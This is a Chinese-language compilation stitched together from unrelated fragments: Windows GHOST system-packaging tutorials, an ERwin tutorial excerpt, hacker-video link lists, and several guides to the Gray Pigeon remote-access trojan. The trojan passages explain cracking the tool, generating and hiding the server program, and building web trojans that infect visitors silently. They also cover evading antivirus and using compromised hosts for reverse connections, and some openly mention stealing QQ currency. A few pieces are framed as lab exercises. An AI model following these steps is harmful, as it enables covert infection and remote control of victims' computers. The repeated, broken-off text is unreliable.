教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 详情可以参阅帖子: Windows_XP_Service_Pack_3_X86_CD_VOL_CN微软官方原版下 载:
2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集— —系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软 件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版下载 Microsoft Office 2003 Service Pack 3下载 2007 office system格式兼容文件下载 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 推荐下载 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并
灰鸽子使用方法++网页木马生成和制作详解++图片噢!!! 2007-11-28 23:22:31| 分类:技术| 标签:|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的,我大概说下重点.首先点”自动上线”,在”网易免费域名更新IP”处先申请一个免费域名,比如https://www.doczj.com/doc/8a5945042.html,,再点”更新IP到域名”,如果一次更新出错就反复多试几次,一般会成功 的 图1 再点”配置服务程序’,这里有几点值得注意: 1.”自动上线”处一定要填正确了,就填我们刚才申请的域名https://www.doczj.com/doc/8a5945042.html,,下面的”自动上线连 接密码”可不填,填写是为了安全. 2.关于破解:这也是最关键的地方,在运行鸽子客户端的时候我们先要运行它的破解文件,我们双击hosts.exe,自解压路径不能改变,至于为什么不能变大家想下就会明白了,然后运行http.exe,点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了,我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”,到这服务端就生成了,每一步都是关键的,少一步, 服务端可能就不能生成.
二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的,必需要发给对方运行才行,那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的,我想最好是通过网页,让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多,大家去申请就是了.假设我们现在已经申请好了,空间地址为:https://www.doczj.com/doc/8a5945042.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.doczj.com/doc/8a5945042.html,/setup.exe”,”生成的网页名1,2” 可以随便填,保持默认即可。下面一栏”对于IE5,IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中,在”木马程序名称”处填写setup.exe,在”生成后的chm文件名”处保持默认icyfox.chm即可,在”用于存放上面chm文件的完整地址处填写https://www.doczj.com/doc/8a5945042.html,/icyfox.htm,最后单击生成。将生成的
Gray pigeons -- 灰鸽子是什么呢? 灰鸽子简单的说它是远程监控软件,(黑客类),当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分:客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端(简称:免杀),免杀的话那就是杀毒软件查不到那是一个木马程序! 鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响!(其他的我也说不清楚)如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。(如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用) 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻(前提是需要控制到宽带上网用户) 个人对鸽子的认识我对它的了解也不是全面的(现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧!) ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧! 灰鸽子下载:https://www.doczj.com/doc/8a5945042.html,/file/t06ef189fa(不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜)
(一)备份当前操作系统 封装的第一步,其实是备份当前安装好的操作系统。避免我们在之后的步骤中出现问题,以至于还要重新安装操作系统,浪费时间精力。 系统备份想必大家都会。对于WinXP而言,建议使用Ghost备份。推荐使用U盘装机助理中的Easy Image X 执行Ghost备份操作,Easy Image X 具有图形化操作、便于设置压缩率等特点。 提醒大家要注意的是,我们现在是备份系统以备不时之需,而并非封装完毕后制作系统映像,所以压缩率不用调整的过高,以免浪费更多的备份和恢复时间。压缩率建议选择“快速压缩”,体积略大,但备份和恢复速度都很快。设置完毕后,Ghost备份过程自动启动。
2013-1-22 14:15 上传 下载附件(125.39 KB) 稍事等待后,系统备份完毕。 (二)封装前的准备 封装的目的,是为了快速的部署操作系统,减少不必要的重复劳动。所以,我们需要向源系统集成系统补丁、安装常用软件,从而减少每次部署后的重复劳动。 1、集成系统补丁。集成补丁的方法有很多,例如使用Windows Update、使用第三方安全软件、使用第三方补丁包等。这里推荐大家选用IT天空系统补丁安装助理,一次性安装所有重要补丁。
2、安装常用软件。常用软件常用的一般也就几种,大家请根据自己的系统部署范围而决定。
特别提醒 (1)不是所有的软件都能良好适应系统封装部署,特别是某些国产软件; (2)需要激活的软件,部署完毕后一般都需要重新激活; (3)不建议集成安全类软件,某些安全软件会阻挡正常的系统部署进程,甚至导致蓝屏宕机; (4)如果某些软件不适合集成在系统,可以使用首次进桌面静默安装的方法来解决。 3、备份系统。又备份系统?对,备份。补丁安装要20分钟左右,软件也需要逐个安装与调整,所以整体时间一般不少于30分钟。为防止封装时出现未知错误,建议再次备份系统,以备今后的调整操作。这次备份完,我们就可以放心大胆的开始封装操作了。
ES4完美封装图文教程-虎鲨软件站 作者:S大源于天空,高仿必究 (一)备份当前操作系统 封装的第一步,其实是备份当前安装好的操作系统。避免我们在之后的步骤中出现问题,以至于还要重新安装操作系统,浪费时间精力。 系统备份想必大家都会。对于WinXP而言,建议使用Ghost备份。推荐使用U盘装机助理中的Easy Image X 执行Ghost备份操作,Easy Image X 具有图形化操作、便于设置压缩率等特点。 提醒大家要注意的是,我们现在是备份系统以备不时之需,而并非封装完毕后制作系统映像,所以压缩率不用调整的过高,以免浪费更多的备份和恢复时间。压缩率建议选择“快速压缩”,体积略大,但备份和恢复速度都很快。设置完毕后,Ghost备份过程自动启动。
稍事等待后,系统备份完毕。 (二)封装前的准备 封装的目的,是为了快速的部署操作系统,减少不必要的重复劳动。所以,我们需要向源系统集成系统补丁、安装常用软件,从而减少每次部署后的重复劳动。 1、集成系统补丁。集成补丁的方法有很多,例如使用Windows Update、使用第三方安全软件、使用第三方补丁包等。这里推荐大家选用IT天空系统补丁安装助理,一次性安装所有重要补丁。
2、安装常用软件。常用软件常用的一般也就几种,大家请根据自己的系统部署范围而决定。
特别提醒 (1)不是所有的软件都能良好适应系统封装部署,特别是某些国产软件; (2)需要激活的软件,部署完毕后一般都需要重新激活; (3)不建议集成安全类软件,某些安全软件会阻挡正常的系统部署进程,甚至导致蓝屏宕机; (4)如果某些软件不适合集成在系统,可以使用首次进桌面静默安装的方法来解决。 3、备份系统。又备份系统?对,备份。补丁安装要20分钟左右,软件也需要逐个安装与调整,所以整体时间一般不少于30分钟。为防止封装时出现未知错误,建议再次备份系统,以备今后的调整操作。这次备份完,我们就可以放心大胆的开始封装操作了。 (三)第一阶段封装 Easy Sysprep v4 (ES4)与之前ES3、ES2以及传统封装辅助工具最大的不同,在于其将封装分为了两个阶段。 第一阶段:以完成封装操作为首要目的; 第二阶段:以完成对系统的调整为首要目的。 将封装与调整分开,减少调整操作对封装操作的影响,保障封装成功率。 1、启动ES4
自个就不做了,VDH恢复的方法也很简单,Google 去吧 整理一些资料,有兴趣的朋友可以自己定制个属于自己的Windows 7`` 封装 & 安装教程 一、系统安装: Windows 7 版本任意 安装好系统后可以,安装你想要的软件 比如汉化包等等都可以`` 二、安全调整: 对系统进行手动调整,流程如下: 1、C:\Windows\Web\Wallpaper 里面是Windows自带墙纸,不需要的可以删除掉,或者转移至其他盘(50M) 2、C:\Windows\System32\DriverStore\FileRepository 这个文件夹中是Window自带驱动备份,一般来说都不需要,所以可以删除(1.06G),但是删除后系统恢复时无法找到驱动,建议不要删除。当然了,如果你想直接删除这个文件夹的话,系统会提示你没有权限,所以我们就要获得这个权限。首先在C:\Windows\System32\DriverStore\FileRepository上点击右键-属性,我们先来获得这个文件夹的所有权,点安全-高级-所有者,接着点编辑-高级其他用户或组,在输入选择的对象名称里面输入你的用户名,或者点高级-立即查找,选择你的用户名,确定,然后选择替换子容器和对象的所有者,不选择这个的话,我们就只有这个文件夹的所有权,并没有他的子文件夹和里面的文件的所有权,然后应用-确定,这样我们就拥有了这个文件夹的所有权,因为之前这个文件夹的所有权是属于System,并不属于我们。再点权限-编辑-添加,把你的用户名填入或者用高级-立即查找,确定,再点击你的用户名-编辑,把完全控制/允许那个打勾,确定,再把使用可从此对象继承的权限替换所有后代上现有的可继承权限打勾,同前面,这个不打勾你就只有外面那文件夹权限,里面的文件夹还是不能“完全控制”,然后点应用-确定-确定-确定。好了,里面的文件夹,你想怎么删就怎么删吧。 3、C:\Windows\Downloaded Installations 有一些程序(Dreamweaver。。)安装的时候会把安装文件解压至此文件夹里面,可以删除之
灰鸽子远程控制软件 【实验内容】 灰鸽子木马是网络上常见的并且功能强大的远程后门软件。采用dll注入技术,开启服务程序,从而实现远程控制的目的。本实验以灰鸽子木马为例进行木马的制作、种植和攻击。实验原理】 木马,全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出先在希腊神话传说中。一般木马程序都是隐蔽的进程,不易被用户发现。计算机木马程序一般具有以下几个特征: 主程序有两个,一个是服务端,另一个是控制端。服务端需要在主机执行。 当控制端连接服务端主机后,控制端会向服务端主机发出命令。而服务端主机在接受命令后,会执行相应的任务。 灰鸽子是国内一款著名后门软件,是国内后门软件的集大成者。具有丰富而强大的功能、灵活多变的操作、良好的隐藏性。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 【实验环境】 本地主机(WindowsXP)、Windows实验台,灰鸽子客户端软件。 实验的网络拓扑如图3.5.8-8所示,实验目标需首先确定所在主机实验台IP地址,并根据实验步骤填写正确的IP地址进行实验。 Windows实验台 本地主机 图3.5.8-8 【实验步骤】 一、木马制作 启动实验台,并设置实验台的IP地址,以实验台为目标主机进行攻防试验。 (1)在学生客户端,下载木马制作程序,打开客户端程序(可能需退出安全程序),灰 鸽子客户端的操作界面如下图所示。
(2)首先需要配置服务程序。点击“配置服务程序”,出现如下图所示的界面。 图 3.5.8-10 (3)在“自动上线设置”里,填写上“IP通知http访问地址、DNS解析域名或固定IP”, 此时填写学生客户端IP地址,然后设置连接密码,如下图所示。 图 3.5.8-11 (4)为了保证服务端程序运行的隐蔽性,我们可以把“安装选项”里的“安装后自动删 除安装文件”选中;如下图所示。
Getting Started with ER win (Erwin 入门) by Dr. Peter Wolcott Department of Information Systems and Quantitative Analysis College of Information Science and Technology University of Nebraska at Omaha(由内布拉斯加州的奥马哈大学信息科学与技术学院门的信息系统和定量分析博士彼得著) Introduction (介绍) ER win is a popular data modeling tool used by a number of major companies in Omaha and throughout the world. (Erwin是受奥马哈和世界各地的一些主要的公司欢迎的数据模型工具) The product is currently owned, developed, and marketed by Computer Associates, a leading software developer.(该产品是由具有领导地位的CA软件开发公司拥有、开发和销售) The product supports a variety of aspects of database design, including data modeling, forward engineering (the creation of a database schema and physical database on the basis of a data model), and reverse engineering (the creation of a data model on the basis of an existing database) for a wide variety of relational DBMS, including Microsoft Access, Oracle, DB2, Sybase, and others.该软件为多种多样的关系型数据库管理系统,包括 Microsoft Access,甲骨文,Sybase,DB2,和其他人提供支持数据库设计的各个方面,包括数据建模、正向工程(在现有的数据模型的基础上创建数据模式和物理数据库)和逆向工程(在现在的数据库基础上创建数据模型) This brief tutorial steps you through the process of creating a data model using ER win.(你可以通过这个简单教程中的步骤运用Erwin来创建数据模 型) It will not explain all aspects of ERwin, but will show you the minimum necessary to create and use data models for this class. (这个课程不可能全面地讲解Erwin,但它向你展示了必要的最基本的创建和使用数据模型的知识) It consists of three major segments, which correspond to the project-related assignments in your class: (这个课程由三个主要部分组成,它与有关项目任务相符) 1.Creation of a basic data model (Conceptual data model) 创建一个 基本的数据模型(概念数据模型) 2.Creation of a database schema 建立数据库模式 3.Creation of the database创建数据库
任务名称:灰鸽子木马利用与防护 任务目的与要求: 了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击。本次任务要求学生学习灰鸽子木马远程控制软件的使用,通过实验可以了解木马和计算机病毒的区别,熟悉使用木马进行网络攻击的原理和方法。 实验任务涉及到的相关知识: 任务环境拓扑: 具体步骤: 1.登录windows2003,打开灰鸽子软件。 winxp windows2003
2.灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端,点击“确定” 3.登录到XP系统。点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。
4.返回win2003,点击“文件”-“增加主机”,输入XP的IP地址192.168.0.43(以在XP下通过ipconfig命令查看到得IP为准),点击确定。 5.双击文件目录浏览下的“我的电脑”,可以查看到主机为192.168.0.43的标识。然后双击192.168.0.43,可以查看到XP系统的目录及文件。此时点击C:\Documents and Settings\Administrator\桌面,可以查看到XP左面上放置的文件setup.exe服务器端。
序: 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。(8000端口是灰鸽子的默认端口,这个端口是可以更改的) 要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多,设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。 正文: 第一步: 把vidc的服务端vidcs传到公网的机子上,肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图:
GHOST系统封装详细图文教程[完整版](适合初学者) 2009-06-28 21:42 教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集——系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版 Microsoft Office 2003 Service Pack 3 2007 office system格式兼容文件 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用
PS/2鼠标操作! 系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE 补丁就不是很完整。 2、系统主题屏保安装: 首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序 然后是安装系统主题 三、系统设置 ——这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。 1、设置任务栏:建议按如下图进行设置 2、任务栏快捷图标建议保留三个(如下图) 3、系统属性设置: A)远程设置——把两个勾都去掉
看到很多会员说封装时出现各种各样的问题,感觉还是因为看的封装教程太多,封装工具也太多、太乱,都不知道该怎么具体操作了,所以会出现这样那样的错误。本人就将自己的封装经验写出来分享一下。 本文中涉及的文章及帖子,可能部分会员无法阅读,如果是这种情况,请你努力发表有意义的帖子,达到中级会员,这样就可以阅读了。对你造成的不便还请谅解! 教程架构: 第一篇系统、工具及软件安装 第二篇封装工具选择及实战 第三篇光盘ISO文件制作 下面以封装制作GHOSTXPSP3为例,进行讲解! 第一篇系统、工具及软件安装 一、准备工作 1、操作系统选择:建议采用微软官方的VOL原版 ——为什么要用VOL原版?因为VOL原版适用于任何电脑,而某些品牌机赠送的是OEM版,只能用于对应的品牌电脑,并且还需激活! ——特别说明一下:很多人喜欢说正版,其实所谓的正版是要通过微软官方验证的,但是系统内容却并不一定是原版的。 详情可以参阅帖子: Windows_XP_Service_Pack_3_X86_CD_VOL_CN微软官方原版下载: 2、系统补丁:主要靠自己平时收集整理,建议到微软官方下载 如果没有,可以使用别人做好的,推荐一个比较好的系统补丁集——系统之家,每月都有更新! 也可以使用360安全卫士下载,然后收集整理。 3、办公软件:一般来讲,做GHOST封装都会安装OFFICE办公软件,也建议采用微软原版,不要使用修改版。 Microsoft Office 2003_vol原版下载
Microsoft Office 2003 Service Pack 3下载 2007 office system格式兼容文件下载 4、工具软件:可以根据自己的爱好并结合电脑城装机的实际情况安装部分常用工具软件。这些软件大部分都是共享的免费软件,也建议到相应的官方网站下载,尽量不要使用第三方修改版本! 推荐下载 二、系统安装 1、微软官方原版系统安装过程图解 补充一下:为了封装系统的稳定,建议全新安装,即使用全盘格式化进行安装;同时在安装系统、工具、软件的时候断开外部网络;并使用PS/2鼠标操作! 系统安装好后就可以进行系统补丁、工具软件、办公软件的安装——这里讲点窍门:先装工具软件、办公软件,最后装系统补丁。因为很多集成补丁包里面含有WMP、OFFICE、DX、AX补丁,如果先装,可能你的OFFICE补丁就不是很完整。 2、系统主题屏保安装: 首先进行系统主题破解,这里有适合XPSP2、XPSP3使用的破解程序 然后是安装系统主题 三、系统设置 ——这是一个比较复杂的东西,很多人都有自己的理解,也有自己的爱好。
一定要用迅雷下,不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/hideadmin1.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/hideadmin2.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/CHM1.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/BEAST1.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/BEAST2.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/BEAST3.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/VMware1.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/VMware2.wmv https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.doczj.com/doc/8a5945042.html,/eschool/esafe2/Iris01.wmv
系统封装,说简单就是把系统制作成镜像的方法刻录到光盘,用在系统安装上面.系统封装,不同于系统的正常安装。最本质的区别在于系统封装是将一个完整的系统以拷贝的形式打包,然后用粘贴的形式安装在另外一个系统盘上,而正常安装则是通过Setup程序进行安装。举一个不太贴切的例子,你要铺草坪,你可以在那片土地上撒草籽等待草的长成,也可以直接购买草皮。而这层草皮就相当于系统封装。使用系统封装可以把系统安装的时间缩短NN 倍,封装安装方法安装系统只需要5-10分钟!而比正常安装大大节约了时间。 目录 一、前期基础工作 二、系统DIY 三、系统减肥(可选) 四、更改系统硬件驱动(关键) 五、整理磁盘碎片(推荐) 六、系统封装(推荐) 七、制作Ghost系统镜像文件 八、制作启动光盘 ============================================================ 万能Ghost系统封装教程(完整) 目录 一、前期基础工作 二、系统DIY 三、系统减肥(可选) 四、更改系统硬件驱动(关键) 五、整理磁盘碎片(推荐) 六、系统封装(推荐) 七、制作Ghost系统镜像文件 八、制作启动光盘 九、附录
一、前期基础工作 1、准备封装所需工具软件 *虚拟机VMware vmware+5.5.3+中英双语精简版 *Windows2K/XP/2003系统安装光盘(推荐使用免激活的版本) *DEPLOY.CAB(在系统安装光盘:\SUPPORT\TOOLS目录下提取) *YLMF 系统DIY Y1.6(系统信息修改工具) *Drivers.exe(系统补充驱动程序包) *Drvtool.exe(驱动程序选择工具) *Convert.exe(系统盘转换为NTFS格式工具,可以从YLMF的Ghost系统中提取)*DllCacheManager_V2.0(DLL文件备份恢复工具) *Font_Fix_1.0.exe(字体文件夹减肥程序) *CorePatch.exe(酷睿双核CPU补丁) *cfgtool.exe(深度系统设置工具) *UXTheme Multi-Patcher (Neowin Edition) 4.0.exe(主题破解程序) *Ghost_v8.3(v8.0以上版本才能够支持NTFS分区) 2、需要替换的系统资源 *桌面背景壁纸(C:\WINDOWS\Web\Wallpaper)800*600以上 *安装时的背景图片(C:\WINDOWS\system32)800*600/1024*768 *OEM图片(C:\WINDOWS\system32)169*60